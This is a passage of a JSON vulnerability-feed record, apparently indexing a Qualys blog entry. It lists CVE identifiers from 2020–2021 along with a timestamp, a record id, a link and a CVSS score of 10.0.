"CVE-2020-1472", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-20016", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-22502", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22986", "CVE-2021-26084", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42258"], "modified": "2021-11-09T06:15:01", "id": "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}